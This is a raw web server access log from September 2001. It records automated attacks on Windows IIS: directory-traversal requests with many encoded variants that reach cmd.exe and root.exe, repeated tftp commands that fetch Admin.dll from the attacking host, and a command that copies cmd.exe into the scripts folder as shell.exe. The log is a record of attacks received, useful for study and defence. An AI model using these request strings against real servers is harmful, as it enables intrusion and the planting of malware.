20010930 15:28:19: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 20010930 15:28:19: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:19: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:20: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:20: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:21: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:21: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:22: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:22: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:23: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:23: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:24: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:24: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:25: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:25: w010.z208036037.lax-ca.dsl.cnc.net [208.36.37.10] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:28:26: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/root.exe?/c+dir HTTP/1.0" 20010930 15:38:21: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/root.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/Admin.dll HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /MSADC/root.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /MSADC/Admin.dll HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:22: petmrpc2.wustl.edu [128.252.241.167] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /c/Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:23: petmrpc2.wustl.edu [128.252.241.167] "GET /d/Admin.dll HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 20010930 15:38:24: petmrpc2.wustl.edu [128.252.241.167] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:25: petmrpc2.wustl.edu [128.252.241.167] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:26: petmrpc2.wustl.edu [128.252.241.167] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:26: petmrpc2.wustl.edu [128.252.241.167] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 20010930 15:38:27: petmrpc2.wustl.edu [128.252.241.167] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:27: petmrpc2.wustl.edu [128.252.241.167] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:27: petmrpc2.wustl.edu [128.252.241.167] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:27: petmrpc2.wustl.edu [128.252.241.167] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:27: petmrpc2.wustl.edu [128.252.241.167] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 20010930 15:38:28: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%2f../Admin.dll HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:29: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:30: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35%63../Admin.dll HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:31: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%%35c../Admin.dll HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:32: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20128.252.241.167%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 20010930 15:38:33: petmrpc2.wustl.edu [128.252.241.167] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 20010930 15:38:34: [64.226.245.184] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe"